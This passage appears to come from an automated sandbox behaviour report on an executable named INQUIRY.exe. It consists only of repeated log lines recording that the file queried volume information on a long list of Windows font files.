                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
